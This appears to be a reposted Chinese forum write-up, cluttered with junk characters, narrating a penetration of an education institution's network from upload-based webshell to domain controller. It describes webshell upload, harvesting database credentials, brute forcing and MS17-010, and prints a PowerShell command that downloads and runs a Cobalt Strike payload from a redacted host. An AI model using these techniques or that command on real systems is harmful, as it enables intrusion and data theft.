|
( K* K5 H1 X& p- x! c* D
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
1 B5 c0 `5 g5 }3 |% j1 X/ [) Z8 W. ]5 v
: ^6 O9 j. }% E- E9 y, F! w6 E& w4 X# e6 T) r/ V4 F$ u. r
6 u3 O/ o" U3 }! b) z& k ; h5 H" U) C1 c$ ]' T5 G
8 A3 o, K6 j6 j0 b5 V 正文! I4 V1 w. ~- `. M) g
% V! Q5 v$ x% e
7 [$ v4 Z( E) a6 y2 b: f. I4 ^& ]
; ~- U* F1 d! g7 n z
- @& r* c, u9 C0 e }
[ Y" g; q7 {& U. f# s. f 目标:www.xxxx.com(一家教育机构)
3 i( T2 o, ?& h+ n/ F* d4 ?; `# k
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
0 t5 L/ Z9 z6 I7 [ ' B$ y) k" x7 d6 b
- J; M3 G9 ^2 v4 r7 X, d  6 W; i! h0 Y4 ^6 o" m
/ i8 ?2 H' N: c/ o: c: a
; ~! r) c8 H) u7 u' `
进行了简单的信息搜集
+ f4 ^" q. q2 Q9 u6 |# B( Y9 t3 j
4 {, k3 I& [: P# _9 q' c/ I
: l/ h7 w( G+ e+ |$ g' V u
- _. h' |! P C, Q
) L2 C- v* f# N+ i 子域名搜集$ [3 t) b" K" R% w; V* m
4 e) C/ Y! w& k7 @5 [
8 I) V# ?3 Z# y$ S: I; q3 J
) Z$ o: A& g, a
- G5 { H- e% ], ~$ q; ~
$ R6 S; {& I- z9 t, U fofa找资产
9 w) N; Y" I& o* _6 ?" R, J1 m
/ N) ~4 M* z% z
+ {4 ^( s% `0 V5 r a
5 I' C: C9 T) A% H9 D" |
4 v9 d# P3 H" D" h- @ 
& E1 f6 J3 x2 o/ o! } * T5 [2 i7 m1 Q& w* I5 L0 W8 F
' [" J1 B7 v' p+ y1 A* F
一共七个资产。去重之后只有两个。
2 d. J* u6 p: e
! E9 A" [& o) R+ U3 M
/ b: b; G+ D) u! A! l, }/ t& y
8 E X8 b6 C3 O) \3 q- z- i: j- z
目录探测1 f# z% T% _9 ~1 }
6 b D: S! Y2 W! k3 E! X2 a
4 {. f/ x5 M8 O3 c/ `7 ~" V# k 
, s4 w0 x s7 Q$ F
- |# D& \2 f, D/ ~# p0 \
! v% G! g4 W! C" @: ~/ y$ p- r 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
( z3 q" a8 |$ R3 P# r; h
) K* r8 J5 w) w# P: d
, B* d& P( i* f* B8 U2 B 5 O/ L) @; O! G. _! n. I
1 s4 v+ H' ^2 C; l! H 我又尝试了通过修改返回包来绕过登录界面0 Z z' n7 S/ B0 A, w3 g! q; z7 V; V
4 g6 x- @9 P' f' O
# \2 N; L+ i* ?! Q* S  8 S8 U. b6 d. q$ m! t5 R! J# {
% \/ A- A8 h: d. i: D4 O' ]
7 v# a# ?' i5 [
还是不行,尝试注入无果- q+ ]1 G6 g& A" |6 T% n' X
, _' B6 S3 I% g6 l5 Q3 G, i4 E5 T
t' _/ }1 j# c 8 ?3 h1 c7 i1 W
# I5 x0 k2 e8 X' n6 q+ ~1 P1 X
不过我目录探测出了一处Spring信息泄露
7 X3 U4 J6 q; a+ K, N
, c+ \) p3 _/ z" D/ {, q O# g5 v1 J' K0 a, g( J7 o) W( l
, G; r1 f G" e
/ a4 O) n8 u8 a& i) g  1 M+ R( @3 s2 ^" b0 x
+ ~' m8 \- w: M5 ~- X
! b& F3 N$ D' e 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
6 Z: r, Z4 B# z2 f1 j ; H" \3 t0 ^, Q( h/ R: P
& c% p5 A/ [0 D D9 U  ' m( J% _0 ]6 _% t0 B/ l" o
8 {/ q* S7 _" H5 f
$ @3 v* z8 \ K* `
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
& m- ]1 w7 d* U+ q7 Z " g' b6 F- ~( G/ U
6 ~! `! G- i# }7 G
 3 d( N! z6 @ p) T, e' e
]( @, a+ u y' y* c. G" K% d$ i, K2 y6 g5 U" l+ H
获取有些师傅到这一步就手机抓包电脑测了。
, v, H9 r+ k5 g: U( W) E" L
7 S1 ]9 l, V* \5 Y4 p& D; g1 U, H. d
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
5 f1 d5 K) ~6 M0 }! n . M* E- G) }0 C. ~9 w( q7 d
6 o0 `5 ~1 l6 {% q' O! X3 S
其中在一个公众号发现了小程序,可以进行注册。. p+ e) f. W! \. i6 w
, y% N$ h1 d) [) v/ `
9 h* |+ o$ m% H# A
看到了头像上传,尝试上传获取WebShell
* G& S" D W$ f0 v. V" O k F4 b4 |% l) V' p0 o! j
! ^2 o* ^" j/ A2 n: G. H' K' s B( j0 |  0 v8 z! V8 D7 }: R+ q( y- G& H
* f/ H! ^7 B8 k
/ v2 H/ w* v) g 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问- i" K; y" c* ?! R) {
; m! P% w' s( I4 }. F7 h w- U- g
, G6 A7 Z6 z8 t4 W4 i$ q. j
# U0 y, \/ t8 A; d) U' `
: t4 \# c" `6 U# ^# M. m7 e1 w+ o9 c
然后上了大马
6 G6 m- o/ V0 L7 ^! }4 E- \7 d + e2 S* M4 [0 f
$ f& D3 O* H+ [2 _) L8 y: q
 0 f3 ]" }& p; o6 R" ?
1 I% ]; T7 Y/ r) X* h- d' E: r+ R* l! L( V- a. a& V
+ l% |7 |2 W) y! k8 G $ i4 V# k- A+ }; R0 U
. k, m. z. v; D' I$ {6 m+ {
通过翻找文件发现数据库账号密码
4 ~ K2 ^6 [$ J 6 x0 e V& U8 A0 U, p
" m* [1 `$ j V o
' o6 ?1 i4 I4 n8 N6 B5 |8 j! Y; b" Y " _6 u' r" T2 r# X" v! p
$ a* A7 Q% O: @* [( k1 w
--内网渗透
8 W' d, b, G7 E+ w3 o; |
! v/ p0 C) N# e, h+ E& `1 A2 z: n+ B7 i0 x9 J9 L
直接通过powershell执行 cs上线0 b9 k! k5 ~4 B) \
2 \8 Q+ a' a6 r% I* C
1 k6 M' G! ?' z' d" F0 G8 [ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"$ W0 _, O& c! g9 J9 y, R9 |
9 N! j, f% T' v
# |. W d$ C6 d4 {
 9 U; N* T- X! N1 t
5 Z6 }- C) M+ B, b2 c* S
) t$ i) X7 ]: S1 Y( Z8 N: I 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
: V1 S% o# D: e9 O, m 1 U2 N& [1 X# M7 i6 e t! Y8 n
8 x% S' U! q6 w {2 z6 t& _+ K% X  1 {1 C2 O9 }" z0 _, ~- E
9 j2 F, U4 e1 r8 p3 \0 s1 A& {: c
9 [7 w( y; S3 ^8 p 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
4 a) f2 i# Y/ s; a5 @! {
/ j% @: Q- ]$ y8 o" N4 M2 a5 _- z
' O+ n" v3 u7 ]4 T+ C j x, ]
0 F! @' c1 R( l* `6 O0 X + {1 F/ \7 E- u; w
, p+ v. D$ V) Z! T, H4 F( y, X 
8 N( Z! M1 l' z/ B- }( | W5 m * `0 L$ f8 y" R
K: t- W1 w2 L 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
! o3 ~( w) h. J$ i# G& p
: N% q9 V" J" k
; n8 ^" T- w4 B4 m8 g- h5 Y
1 O- U: f7 n! S% J4 K% t) j) U9 |2 S3 D3 O
/ }8 ?' G0 ^ a7 {0 }/ K 4 }( n+ y, U( W. k% `
2 ?7 o# c7 y" Z* W
) w, H9 f5 |! B! e
/ p# d2 G/ X3 g9 f" ?/ H9 {. g( a/ l! K2 c
+ L6 i6 e6 `/ A+ \, }# a7 J0 Q( z/ F8 J" Q
q3 v) ?! W. ~. \4 H. H1 i i3 Q ! m) D& L$ h3 K9 }
) e" M8 j1 J3 r0 C) O2 b2 d
小结
8 y& {( o+ M# i4 H( t" j
' x6 \" i. `4 c9 H( N9 g( x* S
0 C: T5 v# D9 ^4 R \. y4 s 7 v' _& N9 x0 }* ]7 ~
! r3 g( z) ], E+ Z" l [3 @) c% |+ ^ s; ~: _) X
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
6 r5 m3 r) i) H% C
7 K( S$ d+ v& @9 Y* Z: r/ I- M. m/ c8 z+ T$ Q* g$ `* V
2 k+ h2 n3 U, V
5 X0 j2 M) d' W
4 t" A0 l$ J3 V- s1 u6 v/ v -
: {5 u1 R2 y1 R3 _( {! x( R3 T ( i% b3 A/ a! N' d
6 H- ]& F( ~" v# A1 k6 Z& D
-
3 ^. `2 `- W2 g# L7 E$ H9 t
: c' P# ^' X' p& |) p9 j
1 w% Y8 i& J; t- Y
! k8 g; A5 m( D) }" g. \- t+ P; y; c, i
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
4 v5 k- h) _' [3 k* Z & {2 z# q. M3 z) D8 ]1 D9 G
4 H; b3 h/ f$ V: P0 k- d
1 V! a2 d* L' x; q" M4 q
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对